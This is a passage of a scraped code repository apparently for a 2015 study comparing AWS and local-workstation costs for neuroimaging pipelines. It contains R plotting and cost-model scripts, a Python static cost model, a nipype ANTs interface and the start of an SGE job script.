datasets_instance <- 3\n hours_dataset <- .75\n \n # costs of head and node instances\n head_cost_hour <- 0.052\n node_cost_hour <- 0.26\n \n # storage related costs\n EBS_overhead <- 20\n EBS_GB_dataset <- 4.5\n EBS_GB_month <- 0.1\n hours_month <- 30*24\n num_copies <- 3\n \n \n #xfers\n xfer_cost_BG <- 0.09\n \n \n # calculate the number of instances\n num_instances <- min(c(ceiling(num_datasets/datasets_instance),20))\n \n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n \n total_cost <- num_hours * (head_cost_hour + num_instances * node_cost_hour) +\n num_datasets * EBS_GB_dataset * (num_hours / hours_month) * EBS_GB_month +\n num_datasets * EBS_GB_dataset * xfer_cost_BG\n \n total_cost <- if(is.nan(total_cost)) 0 else ceiling(total_cost)\n #return(c(num_instances,num_iters,num_hours,total_cost))\n #return(total_cost,num_hours)\n return(total_cost)\n}\n\ncalc_costs_aws_ondemand <- function(x){\n num_datasets <- x\n num_months = 48\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # costs of head and node instances\n head_cost_hour <- 0.052\n node_cost_hour <- 1.6\n \n # storage related costs\n EBS_overhead <- 20\n EBS_GB_dataset <- 4.5\n EBS_GB_month <- 0.1\n hours_month <- 30*24\n num_copies <- 3\n \n \n #xfers\n xfer_cost_BG <- 0.09\n \n \n # calculate the number of instances\n num_instances <- min(c(ceiling(num_datasets/datasets_instance),20))\n \n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n \n total_cost <- num_hours * (head_cost_hour + num_instances * node_cost_hour) +\n num_datasets * EBS_GB_dataset * (num_hours / hours_month) * EBS_GB_month +\n num_datasets * EBS_GB_dataset * xfer_cost_BG\n \n total_cost <- if(is.nan(total_cost)) 0 else ceiling(total_cost)\n #return(c(num_instances,num_iters,num_hours,total_cost))\n #return(total_cost,num_hours)\n return(total_cost)\n}\ncalc_time_aws <- function(x){\n num_datasets <- x\n num_months = 48\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # calculate the number of instances\n num_instances <- min(c(ceiling(num_datasets/datasets_instance),20))\n \n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n \n return(num_hours)\n}\n\ncalc_time_cap <- function(x){\n num_datasets <- x\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # calculate the number of instances\n num_instances <- 1\n \n # calculate the number of hours\n num_iters <- max(ceiling(num_datasets / (datasets_instance * num_instances)),1)\n num_hours <- ceiling(hours_dataset * num_iters)\n \n return(num_hours)\n}\n\ncalc_costs_cap <- function(x){\n num_datasets <- x\n \n workstation <- 8642\n \n salary <- .05 * 50000 * 1.25\n \n power_supply_kw <- .9*1100/1000\n power_kw <- .1055\n \n # constants based on capacity of instances\n # and C-PAC capacity\n datasets_instance <- 3\n hours_dataset <- .75\n \n # calculate the number of instances\n num_instances <- 1\n \n # calculate the number of hours\n num_iters <- ceiling(num_datasets / (datasets_instance * num_instances))\n num_hours <- ceiling(hours_dataset * num_iters)\n \n 
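# (added note: capital cost below = one-time workstation purchase + 5%\n  # of a $50k salary with a 1.25 multiplier, presumably fringe/overhead,\n  # + electricity for the hours used: 0.9 * 1100 W at $0.1055 per kWh)\n  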
total_cost = workstation + salary + num_hours * power_supply_kw * power_kw\n \n return(total_cost)\n}\n\n\nsalary <- .05 * 50000 * 1.25\nworkstation <- 8642\npower_cost_h <- .1055 * 1100/1000 *.9\n\ncap_costs <- salary + workstation\ncosts_compare<-data.frame(num_datasets=seq(0,6000,1))\ncosts_compare$op_costs_2spot<-apply(costs_compare[1],1,calc_costs_aws_2spot)\ncosts_compare$op_costs_spot<-apply(costs_compare[1],1,calc_costs_aws_spot)\ncosts_compare$op_costs_ondemand<-apply(costs_compare[1],1,calc_costs_aws_ondemand)\ncosts_compare$cap_costs<-apply(costs_compare[1],1,calc_costs_cap)\ncosts_compare$workstation<-apply(costs_compare[1],1,function(x) workstation)\ncosts_compare$salary<-apply(costs_compare[1],1,function(x) salary)\ncosts_compare$electricity<-apply(costs_compare[1],1,function(x) calc_time_cap(x)*power_cost_h)\ncosts_compare$salary_electricity<-apply(costs_compare[1],1,function(x) calc_time_cap(x)*power_cost_h+salary)\ncosts_compare_m=melt(costs_compare,id=\"num_datasets\")\ncosts_compare_m$variable=revalue(costs_compare_m$variable,c(\"op_costs_2spot\"=\"AWS Spot 2X\",\n \"op_costs_spot\"=\"AWS Spot\",\n \"op_costs_ondemand\"=\"AWS On Demand\",\n \"cap_costs\"=\"Workstation, Maintenance,\\nand Electricity\",\n \"workstation\"=\"Workstation\",\n \"salary\"=\"Maintenance\",\n \"electricity\"=\"Electricity\",\n \"salary_electricity\"=\"Maintenance and\\nElectricity\"))\n\ntime_compare<-data.frame(num_datasets=seq(0,6000,1))\ntime_compare$cap_time<-apply(costs_compare[1],1,calc_time_cap)\ntime_compare$op_time<-apply(costs_compare[1],1,calc_time_aws)\ntime_compare_m=melt(time_compare,id=\"num_datasets\")\ntime_compare_m$variable=revalue(time_compare_m$variable,c(\"cap_time\"=\"Local Execution Time\",\n \"op_time\"=\"AWS Execution Time\"))\np1<-ggplot(costs_compare_m)+\n geom_line(aes(num_datasets,value,color=variable))+\n scale_y_continuous(breaks = round(seq(min(costs_compare_m$value), max(costs_compare_m$value), by = 2500),1))+\n xlab(\"Number of Datasets\")+\n ylab(\"Cost ($)\")+\n guides(col = guide_legend(ncol = 2, byrow = FALSE))+\n theme_bw()+\n theme(axis.title.x = element_text(size=6,colour=\"black\"),\n axis.title.y = element_text(size=6,colour=\"black\"),\n axis.text.x = element_text(size=6,colour=\"black\"),\n axis.text.y = element_text(size=6,colour=\"black\"),\n legend.position=\"bottom\",\n legend.title=element_blank(),\n legend.key=element_blank(),\n legend.margin=unit(.1,\"cm\"),\n legend.key.height=unit(3,\"mm\"),\n legend.key.width=unit(2,\"mm\"),\n panel.margin=unit(0,\"mm\"),\n legend.text = element_text(size=6))\n\ncost_at_1000=costs_compare_m[costs_compare_m$num_datasets==1000,]\n#cost_at_1000=apply(cost_at_1000[1],1,function(x) x/1000)\n\ntime_at_1000=time_compare_m[time_compare_m$num_datasets==1000,]\n#geom_text(aes(x=1000,y=time_at_1000$value,label = round(time_at_1000$value,0),size=11,family=\"Arial\",vjust=-.5))+\np2<-ggplot(time_compare_m)+geom_line(aes(num_datasets,value,color=variable))+\n xlab(\"Number of Datasets\")+\n ylab(\"Number of Hours\")+\n guides(col = guide_legend(ncol = 2, byrow = TRUE))+\n theme_bw()+\n theme(axis.title.x = element_text(size=6,colour=\"black\"),\n axis.title.y = element_text(size=6,colour=\"black\"),\n axis.text.x = element_text(size=6,colour=\"black\"),\n axis.text.y = element_text(size=6,colour=\"black\"),\n legend.position=\"bottom\",\n legend.title=element_blank(),\n legend.key=element_blank(),\n legend.margin=unit(.1,\"cm\"),\n legend.key.height=unit(3,\"mm\"),\n legend.key.width=unit(2,\"mm\"),\n 
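# (added note: mm-scale legend keys and tight margins keep the legend\n        # legible at the 2.8 in PDF width used for the poster plots below)\n        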
panel.margin=unit(0,\"mm\"),\n legend.text = element_text(size=6))\n\np3<-ggplot(cost_at_1000,aes(x=reorder(variable,value,function(x) x),y=value,fill=variable))+\n geom_bar(stat = \"identity\")+\n geom_text(aes(label=round(value,0),vjust=-.5,size=4))+\n xlab(\"Approach\")+\n ylab(\"Cost for 1000 datasets ($)\")+\n theme_bw()+\n theme(axis.title.x = element_text(size=11,colour=\"black\"),\n axis.title.y = element_text(size=11,colour=\"black\"),\n axis.text.x = element_text(size=11,angle=35,hjust=1,colour=\"black\"),\n axis.text.y = element_text(size=11,colour=\"black\"),\n legend.position=\"\",\n legend.title=element_blank(),\n legend.text = element_text(size=11))\n#costs_compare$cap_costs<-apply(costs_compare,1,function (x) cap_costs)\n\n#\npdf(file = \"~/Dropbox/_CPAC_BISTI/aws_plot_2mm_1.pdf\", width=2.8, height = 3)\nprint(p1)\ndev.off()\n\npdf(file = \"~/Dropbox/_CPAC_BISTI/aws_plot_2mm_2.pdf\", width=2.8, height = 3)\nprint(p2)\ndev.off()\n\npdf(file = \"~/Dropbox/_CPAC_BISTI/aws_plot_2mm_3.pdf\", width=6, height = 6)\nprint(p3)\ndev.off()\n" }, { "alpha_fraction": 0.6134421229362488, "alphanum_fraction": 0.6352376341819763, "avg_line_length": 36.59927749633789, "blob_id": "60197723b780cfda147ffb612c07d9e23bd85fd3", "content_id": "99e95d849a131d2c1f3361364709b96c61af2d7c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 10415, "license_type": "permissive", "max_line_length": 114, "num_lines": 277, "path": "/spot-model/spot_sim_plots.R", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot-model/spot_sim_plots.R\n#\n# Author: Daniel Clark, 2015\n\n# Import packages\nlibrary(ggplot2)\nlibrary(plyr)\nlibrary(reshape2)\nlibrary(grid)\n\n# Init variables\ncpac_csv <- '/home/dclark/Documents/data/aws/sim_results_merged/cpac_df.csv'\nants_csv <- '/home/dclark/Documents/data/aws/sim_results_merged/ants_df.csv'\nfs_csv <- '/home/dclark/Documents/data/aws/sim_results_merged/fs_df.csv'\n\n# Sim plots fixed variables\nbid_ratio <- 2.5\nnum_datasets <- 1000\n\n# Simulation plots\nsim_plots <- function(csv, bid_ratio, num_datasets){\n # Read in dataframe\n df <- read.csv(csv)\n\n # Get fixed bid ratio data frame for plotting\n fixed_bid_df <- subset(df, Bid.ratio == bid_ratio)\n\n # Get fixed dataset size frame for plotting\n fixed_ds_df <- subset(df, Num.datasets == num_datasets)\n\n # Get mean total cost and total time dataframes for fixed bid ratio\n mean_total_cost_df <- ddply(fixed_bid_df, .(Av.zone, Num.datasets), summarize, mean_cost=mean(Total.cost))\n mean_total_time_df <- ddply(fixed_bid_df, .(Av.zone, Num.datasets), summarize, mean_time=mean(Total.time))\n\n # Plot total cost vs. num of datasets\n p0 <- ggplot(mean_total_cost_df, aes(x=Num.datasets, y=mean_cost, colour=Av.zone)) + geom_line()\n p1 <- ggplot(mean_total_time_df, aes(x=Num.datasets, y=mean_time, colour=Av.zone)) + geom_line()\n\n # Get mean total cost and total time dataframes for fixed num datasets\n mean_total_cost_df <- ddply(fixed_ds_df, .(Av.zone, Bid.ratio), summarize, mean_cost=mean(Total.cost))\n mean_total_time_df <- ddply(fixed_ds_df, .(Av.zone, Bid.ratio), summarize, mean_time=mean(Total.time))\n\n # Plot total cost vs. 
bid ratio\n    p2 <- ggplot(mean_total_cost_df, aes(x=Bid.ratio, y=mean_cost, colour=Av.zone)) + geom_line()\n    p3 <- ggplot(mean_total_time_df, aes(x=Bid.ratio, y=mean_time, colour=Av.zone)) + geom_line()\n    \n    p_list <- list(p0, p1, p2, p3)\n    \n    # Return list of plots\n    return(p_list)\n}\n\n# p_list <- sim_plots(cpac_csv, bid_ratio, num_datasets)\n# \n# print(p_list[1])\n# print(p_list[2])\n# print(p_list[3])\n# print(p_list[4])\n\n# Save pdfs\n# pdf(file = \"~/Documents/projects/Clark2015_AWS/poster/mean-costs_1000ds-cpac.pdf\", width=5, height = 5)\n# print(p_list[3])\n# dev.off()\n# pdf(file = \"~/Documents/projects/Clark2015_AWS/poster/mean-times_1000ds-cpac.pdf\", width=5, height = 5)\n# print(p_list[4])\n# dev.off()\n\n\n# Calculate capital costs\ncalc_costs_cap <- function(num_datasets, jobs_per, num_mins){\n\n    # Init variables\n    workstation <- 8642\n    salary <- .05 * 50000 * 1.25\n    power_supply_kw <- .9*1100/1000\n    power_kw <- .1055\n\n    # Compute hours from minutes\n    num_hours = num_mins/60.0\n\n    # Calculate the number of hours\n    num_iters <- ceiling(num_datasets / jobs_per)\n    num_hours <- ceiling(num_hours * num_iters)\n    total_cost = workstation + salary + num_hours * power_supply_kw * power_kw\n\n    # Return total cost\n    return(total_cost)\n}\n\n\n# Calculate capital time\ncalc_time_cap <- function(num_datasets, jobs_per, num_mins){\n\n    # Compute hours from minutes\n    num_hours <- num_mins/60.0\n\n    # Calculate the number of hours\n    num_iters <- max(ceiling(num_datasets/jobs_per), 1)\n    num_hours <- ceiling(num_hours * num_iters)\n\n    # Return total time\n    return(num_hours)\n}\n\n\n# Costs dataframe and plots\ncosts_df_plots <- function(df, max_num, costs_compare){\n\n    # Reshape data\n    costs_df <- melt(df, id=c('X', 'Download.time', 'Upload.time', 'Wait.time',\n                              'Run.time', 'Total.cost', 'Total.time', 'Sim.index',\n                              'Av.zone', 'Bid.ratio', 'Bid.price', 'Num.datasets',\n                              'Start.time', 'Interrupts', 'First.Iter.Time'))\n\n    # Get the levels for variable in required order\n    costs_df$variable <- factor(costs_df$variable, levels=c('Instance.cost', 'Storage.cost', 'Tranfer.cost'))\n    costs_df <- arrange(costs_df, Num.datasets, variable)\n\n    # Calculate the percentages\n    costs_df <- ddply(costs_df, .(Num.datasets), transform, percent=value/sum(value)*100)\n\n    # Format the labels and calculate their positions\n    costs_df <- ddply(costs_df, .(Num.datasets), transform, pos=(cumsum(value) - 0.5*value))\n    costs_df$label <- paste0(sprintf(\"%.0f\", costs_df$percent), \"%\")\n\n    # Get all data under maxnum datasets\n    costs_maxnum <- subset(costs_df, Num.datasets <= max_num)\n    cap_costs_maxnum <- subset(costs_compare, num_datasets <= max_num)\n\n    # Initial plot\n    p0 <- ggplot() +\n          geom_bar(data=costs_maxnum,\n                   aes(x=factor(Num.datasets), y=value, fill=variable),\n                   stat='identity', width=1)\n    # Format plot\n    p0_format <- p0 +\n    xlab(\"Number of Datasets\")+\n    ylab(\"Cost ($)\")+\n    guides(col = guide_legend(ncol = 3, byrow=FALSE)) +\n    scale_fill_discrete(labels=c('Instance Cost ', 'Storage Cost ', 'Transfer Cost ')) +\n    scale_x_discrete(breaks=c(100, 2000, seq(0, max_num, 5000))) +\n    theme_bw()+\n    theme(axis.title.x = element_text(size=12,colour=\"black\", vjust=-.8),\n          axis.title.y = element_text(size=12,colour=\"black\"),\n          axis.text.x = element_text(size=8,colour=\"black\", angle=35),\n          axis.text.y = element_text(size=8,colour=\"black\"),\n          legend.position=\"bottom\",\n          legend.title=element_blank(),\n          legend.key=element_blank(),\n          legend.key.size=unit(1, \"mm\"),\n          legend.margin=unit(1,\"cm\"),\n          
legend.key.height=unit(3,\"mm\"),\n legend.key.width=unit(3,\"mm\"),\n panel.margin=unit(20,\"mm\"),\n legend.text = element_text(size=10))\n\n # Add percentages (optional)\n # p0_perc <- p0_format + geom_text(data=subset(costs_maxnum, Num.datasets >= 7000),\n # aes(x=factor(Num.datasets), y=pos, label=label), size=2)\n\n # Add other line over the top (this isnt working, verrry hard to figure out)\n p0_withline <- p0_format + geom_line(data=costs_compare, aes(x=as.numeric(factor(num_datasets)), y=cap_costs))\n\n # Return plots\n return(p0_withline)\n}\n\n\n# Times dataframe and plots\ntimes_df_plots <- function(df, max_num, times_compare){\n\n # Add total_time difference to df\n df$znodl_diff <- df$Total.time - df$Total.time.nodl\n\n # Reshape data\n times_df <- melt(df, id=c('X', 'Tranfer.cost', 'Storage.cost', 'Instance.cost', 'Wait.time',\n 'Total.cost', 'Total.time', 'Download.time', 'Upload.time', 'Run.time', 'Sim.index',\n 'Av.zone', 'Bid.ratio', 'Bid.price', 'Num.datasets',\n 'Start.time', 'Interrupts', 'First.Iter.Time'))\n\n # Get the levels for variable in required order\n times_df$variable <- factor(times_df$variable, levels=c('Total.time.nodl', 'znodl_diff'))\n times_df <- arrange(times_df, Num.datasets, variable)\n\n # Calculate the percentages\n #times_df <- ddply(times_df, .(Num.datasets), transform, percent=value/Total.time*100)\n\n # Format the labels and calculate their positions\n #times_df <- ddply(times_df, .(Num.datasets), transform, pos=(value - 0.5*value))\n times_df$label <- paste0(sprintf(\"%.0f\", times_df$percent), \"%\")\n\n # Get all data under maxnum datasets\n times_maxnum <- subset(times_df, Num.datasets <= max_num)\n\n # Initial plot\n p0 <- ggplot() + geom_bar(data=times_maxnum,\n aes(x=factor(Num.datasets), y=value/60.0, fill=variable), stat='identity')\n\n # Format plot\n p0_format <- p0 +\n xlab(\"Number of Datasets\")+\n ylab(\"Time (hours)\")+\n guides(col = guide_legend(ncol = 3, byrow = FALSE))+\n scale_fill_discrete(labels=c('No Download ', 'Total Processing Time ')) +\n scale_x_discrete(breaks=c(100, 2000, seq(0, max_num, 5000))) +\n theme_bw()+\n theme(axis.title.x = element_text(size=12,colour=\"black\", vjust=-.8),\n axis.title.y = element_text(size=12,colour=\"black\"),\n axis.text.x = element_text(size=8,colour=\"black\", angle=35),\n axis.text.y = element_text(size=8,colour=\"black\"),\n legend.position=\"bottom\",\n legend.title=element_blank(),\n legend.key=element_blank(),\n legend.key.size=unit(1, \"mm\"),\n legend.margin=unit(1,\"cm\"),\n legend.key.height=unit(3,\"mm\"),\n legend.key.width=unit(3,\"mm\"),\n panel.margin=unit(20,\"mm\"),\n legend.text = element_text(size=10))\n\n # Add percentages (optional)\n # p0_perc <- p0_format +\n # geom_text(data=subset(times_maxnum, Num.datasets >=2000),\n # aes(x=factor(Num.datasets), label=label, y=pos/60), position=position_dodge(width=1),\n # size=3)\n\n # Add trendline\n p0_withline <- p0_format + geom_line(data=times_compare, aes(x=as.numeric(factor(num_datasets)), y=cap_time))\n\n # Return plots\n return(p0_withline)\n}\n\n# Fixed plots\ncpac_csv <- '~/Documents/projects/Clark2015_AWS/spot-model/fixed-outs/cpac_with_dl.csv'\ncpac_csv_nodl <- '~/Documents/projects/Clark2015_AWS/spot-model/fixed-outs/cpac_without_dl.csv'\nfs_csv <- '~/Documents/projects/Clark2015_AWS/spot-model/fixed-outs/fs_with_dl.csv'\nfs_csv_nodl <- '~/Documents/projects/Clark2015_AWS/spot-model/fixed-outs/fs_without_dl.csv'\n\n# Init variables\njobs_per = 3\nnum_mins = 45\n# Number of datasets\nmax_num = 50000\n\n# 
Read in dataframe\ndf <- read.csv(fs_csv)\ndf_ndl <- read.csv(fs_csv_nodl)\n\n# Create capital costs dataframe\ncosts_compare <- data.frame(num_datasets=df$Num.datasets[df$Num.datasets <= max_num])\ntimes_compare <- data.frame(num_datasets=df$Num.datasets[df$Num.datasets <= max_num])\n\n# Populate dateframe with capital costs\ncosts_compare$cap_costs <- apply(costs_compare[1], 1, jobs_per=jobs_per, num_mins=num_mins, calc_costs_cap)\ntimes_compare$cap_time <- apply(times_compare[1], 1, jobs_per=jobs_per, num_mins=num_mins, calc_time_cap)\n\n# Get plots\ncosts_plot <- costs_df_plots(df, max_num, costs_compare)\n# Without percentages\nprint(costs_plot)\n\n# Time no dl\ndf$Total.time.nodl <- df_ndl$Total.time\n# Get plots\ntimes_plot <- times_df_plots(df, max_num, times_compare)\n# Without percentages\nprint(times_plot)\n\n# Save pdfs\npdf(file = \"~/Documents/projects/Clark2015_AWS/poster/fs-costs.pdf\", width=5, height = 5)\nprint(costs_plot)\ndev.off()\n\npdf(file = \"~/Documents/projects/Clark2015_AWS/poster/fs-times.pdf\", width=5, height = 5)\nprint(times_plot)\ndev.off()\n" }, { "alpha_fraction": 0.5506617426872253, "alphanum_fraction": 0.5604252815246582, "avg_line_length": 33.654136657714844, "blob_id": "faf53453eb50aeab0787de9443a31a3299fd953c", "content_id": "6a5ce008552c8da843e1c5e8072ea03b9a3785bd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4609, "license_type": "permissive", "max_line_length": 124, "num_lines": 133, "path": "/spot-model/run_static_model.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# run_static_model.py\n#\n# Author: Daniel Clark, 2015\n\n'''\n'''\n\n# Load config file and run static model\ndef load_and_run(config, av_zone, price_hr):\n '''\n '''\n\n # Import packages\n import os\n import numpy as np\n import pandas as pd\n import yaml\n\n # Relative imports\n from spot_price_model import calc_s3_model_costs\n import utils\n\n # Init variables\n df_rows = []\n cfg_dict = yaml.load(open(config, 'r'))\n\n # Model parameters\n down_rate = cfg_dict['down_rate']\n in_gb = cfg_dict['in_gb']\n instance_type = cfg_dict['instance_type']\n jobs_per = cfg_dict['jobs_per']\n num_jobs_arr = cfg_dict['num_jobs']\n out_gb = cfg_dict['out_gb']\n out_gb_dl = cfg_dict['out_gb_dl']\n proc_time = cfg_dict['proc_time']\n proc_time *= 60.0 # convert to seconds\n product = cfg_dict['product']\n up_rate = cfg_dict['up_rate']\n\n # Evaluate for each dataset size (number of jobs)\n for num_jobs in num_jobs_arr:\n print '%d datasets...' 
% num_jobs\n\n        # Tune parameters for cost model\n        num_nodes = min(np.ceil(float(num_jobs)/jobs_per), 20)\n        num_iter = np.ceil(num_jobs/float((jobs_per*num_nodes)))\n\n        # Runtime parameters\n        run_time = num_iter*proc_time\n        wait_time = 0\n        pernode_cost = np.ceil(run_time/3600.0)*price_hr\n        num_interrupts = 0\n        first_iter_time = proc_time\n\n        # Grab costs from s3 model\n        print av_zone\n        total_cost, instance_cost, ebs_storage_cost, s3_cost, \\\n        s3_storage_cost, s3_req_cost, s3_xfer_cost, \\\n        total_time, run_time, wait_time, \\\n        xfer_up_time, s3_upl_time, s3_download_time = \\\n                calc_s3_model_costs(run_time, wait_time, pernode_cost,\n                                    first_iter_time, num_jobs, num_nodes, jobs_per,\n                                    av_zone, in_gb, out_gb, up_rate, down_rate)\n\n        # Populate dictionary\n        row_dict = {'av_zone' : av_zone, 'down_rate' : down_rate,\n                    'in_gb' : in_gb, 'instance_type' : instance_type,\n                    'jobs_per' : jobs_per, 'num_datasets' : num_jobs,\n                    'out_gb' : out_gb, 'out_gb_dl' : out_gb_dl,\n                    'proc_time' : proc_time, 'product' : product,\n                    'up_rate' : up_rate, 'price_hr' : price_hr,\n                    'static_total_cost' : total_cost,\n                    'static_instance_cost' : instance_cost,\n                    'static_ebs_storage_cost' : ebs_storage_cost,\n                    's3_total_cost' : s3_cost,\n                    's3_storage_cost' : s3_storage_cost,\n                    's3_req_cost' : s3_req_cost,\n                    's3_xfer_cost' : s3_xfer_cost,\n                    'static_total_time' : total_time,\n                    'static_run_time' : run_time,\n                    'static_wait_time' : wait_time,\n                    'xfer_up_time' : xfer_up_time,\n                    's3_upl_time' : s3_upl_time,\n                    's3_dl_time' : s3_download_time}\n\n        # Convert to pandas series and add to list\n        row_series = pd.Series(row_dict)\n        df_rows.append(row_series)\n\n    # Create static model dataframe\n    static_df = pd.DataFrame.from_records(df_rows)\n\n    out_df_path = os.path.join(os.getcwd(), os.path.basename(config).split('.')[0], str(price_hr), av_zone, 'on_demand.csv')\n    if not os.path.exists(os.path.dirname(out_df_path)):\n        os.makedirs(os.path.dirname(out_df_path))\n    static_df.to_csv(out_df_path)\n\n    # Return dataframe\n    return static_df\n\n\n# Make executable\nif __name__ == '__main__':\n\n    # Import packages\n    import argparse\n    import os\n\n    # Init argparser\n    parser = argparse.ArgumentParser(description=__doc__)\n\n    # Required arguments\n    parser.add_argument('-c', '--config', nargs=1, required=True,\n                        type=str, help='Filepath to the sim config file')\n    parser.add_argument('-p', '--price_hr', nargs=1, required=True,\n                        type=float, help='Price per compute hour to assume')\n    parser.add_argument('-z', '--av_zone', nargs=1, required=False, type=str,\n                        help='Specify availability zone of interest')\n\n    # Parse arguments\n    args = parser.parse_args()\n\n    # Init variables\n    config = args.config[0]\n    price_hr = args.price_hr[0]\n    av_zone = args.av_zone[0]\n\n    # Call static model function\n    static_df = load_and_run(config, av_zone, price_hr)\n\n    # Write to disk\n    out_df_path = os.path.join(os.getcwd(), os.path.basename(config).split('.')[0], str(price_hr), av_zone, 'on_demand.csv')\n    static_df.to_csv(out_df_path)\n" }, { "alpha_fraction": 0.6390444040298462, "alphanum_fraction": 0.6463232636451721, "avg_line_length": 52.029701232910156, "blob_id": "c52de9831442a1f767132421426d01c0a71debf2", "content_id": "8db6bbebddb4500eaea06411422ca5116d93e375", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5358, "license_type": "permissive", "max_line_length": 121, "num_lines": 101, "path": "/data-preproc/scripts/act_interface.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", 
"src_encoding": "UTF-8", "text": "# Import packages\nimport os\nimport os.path as op\nimport warnings\nimport numpy as np\nfrom nipype.interfaces.base import (TraitedSpec, File, InputMultiPath,\n OutputMultiPath, Undefined, traits,\n isdefined, OutputMultiPath,\n CommandLine, CommandLineInputSpec)\nfrom nipype.utils.filemanip import split_filename\nfrom nibabel import load\n\nwarn = warnings.warn\nwarnings.filterwarnings('always', category=UserWarning)\n\n\n# Input spec class\nclass antsCorticalThicknessInputSpec(CommandLineInputSpec):\n dimension = traits.Int(argstr='-d %s', mandatory=True,\n position=0, desc='image dimension')\n segmentation_iterations = traits.Int(argstr='-n %s',\n postion=1, desc='N4 iterations during segmentation')\n segmentation_weight = traits.Float(argstr='-w %s',\n position=2, desc='Atropos spatial prior probability' \\\n 'weight for the segmentation')\n input_skull = File(exists=True, argstr='-a %s', mandatory=True,\n position=3, desc='input file')\n template = File(exists=True, argstr='-e %s', mandatory=True,\n position=4, desc='reference file')\n brain_prob_mask = File(exists=True, argstr='-m %s', mandatory=True,\n position=5, desc='brain probability mask')\n brain_seg_priors = traits.Str(exists=True, argstr='-p %s', mandatory=True,\n position=6, desc='brain segmentation priors')\n intensity_template = File(exists=True, argstr='-t %s', position=7,\n desc='intensity template')\n extraction_registration_mask = File(exists=True, argstr='-f %s',\n position=8, desc='extraction registration mask')\n out_prefix = traits.Str(exists=True, argstr='-o %s', mandatory=True,\n position=9, desc='output prefix')\n keep_intermediate_files = traits.Int(True, argstr='-k %s', position=10,\n desc='choose to delete intermediary files')\n\n\n# Output spec class\nclass antsCorticalThicknessOutputSpec(TraitedSpec):\n brain_extraction_mask = File(exists=True,\n desc='')\n brain_segmentation = File(exists=True,\n desc='')\n brain_segmentation_N4 = File(exists=True,\n desc='one for each anatomical input')\n brain_segmentation_posteriors_1 = File(exists=True,\n desc='csf')\n brain_segmentation_posteriors_2 = File(exists=True,\n desc='gm')\n brain_segmentation_posteriors_3 = File(exists=True,\n desc='wm')\n brain_segmentation_posteriors_4 = File(exists=True,\n desc='deep gm')\n brain_segmentation_posteriors_5 = File(exists=True,\n desc='wm')\n brain_segmentation_posteriors_6 = File(exists=True,\n desc='deep gm')\n brain_segmentation_posteriors_N = File(exists=True,\n desc='one for each prior')\n# extracted_anatomical_brain = File(exists=True,\n# desc='skull-stripped anatomical brain')\n ants_registration_affine = File(exists=True,\n desc='one of the antsRegistration warps')\n ants_registration_warp = File(exists=True,\n desc='one of the antsRegistration warps (non-linear)')\n cortical_thickness = File(exists=True,\n desc='')\n cortical_thickness_normalized = File(exists=True,\n desc='')\n\n\n# Cortical thickness node\nclass antsCorticalThickness(CommandLine):\n\n _cmd = 'antsCorticalThickness.sh'\n input_spec = antsCorticalThicknessInputSpec\n output_spec = antsCorticalThicknessOutputSpec\n\n def _list_outputs(self):\n outputs = self.output_spec().get()\n outputs['brain_extraction_mask'] = os.path.abspath('OUTPUT_BrainExtractionMask.nii.gz')\n outputs['brain_segmentation'] = os.path.abspath('OUTPUT_BrainSegmentation.nii.gz')\n outputs['brain_segmentation_N4'] = os.path.abspath('OUTPUT_BrainSegmentation0N4.nii.gz')\n outputs['brain_segmentation_posteriors_1'] = 
os.path.abspath('OUTPUT_BrainSegmentationPosteriors1.nii.gz')\n outputs['brain_segmentation_posteriors_2'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors2.nii.gz')\n outputs['brain_segmentation_posteriors_3'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors3.nii.gz')\n outputs['brain_segmentation_posteriors_4'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors4.nii.gz')\n outputs['brain_segmentation_posteriors_5'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors5.nii.gz')\n outputs['brain_segmentation_posteriors_6'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors6.nii.gz')\n# outputs['extracted_anatomical_brain'] = os.path.abspath('OUTPUT_ExtractedBrain0N4.nii.gz')\n outputs['ants_registration_affine'] = os.path.abspath('OUTPUT_SubjectToTemplate0GenericAffine.mat')\n outputs['ants_registration_warp'] = os.path.abspath('OUTPUT_SubjectToTemplate1Warp.nii.gz')\n outputs['cortical_thickness'] = os.path.abspath('OUTPUT_CorticalThickness.nii.gz')\n outputs['cortical_thickness_normalized'] = os.path.abspath('OUTPUT_CorticalThicknessNormalizedToTemplate.nii.gz')\n return outputs\n\n\n" }, { "alpha_fraction": 0.6075268983840942, "alphanum_fraction": 0.6209677457809448, "avg_line_length": 25.571428298950195, "blob_id": "5517fe9e4260af92cf111ea6615a9cff49a9fdc4", "content_id": "43f84bd66d217a26949aac995047311512e90d56", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 372, "license_type": "permissive", "max_line_length": 49, "num_lines": 14, "path": "/data-preproc/scripts/act_run.sge", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "#! /bin/bash\n#$ -cwd\n#$ -S /bin/bash\n#$ -V\n#$ -t 1-50\n#$ -q all.q\n#$ -pe mpi_smp 8\n#$ -e /home/ubuntu/act_run.err\n#$ -o /home/ubuntu/act_run.out\nsource /etc/profile.d/cpac_env.sh\necho \"Start - TASKID \" $SGE_TASK_ID \" : \" 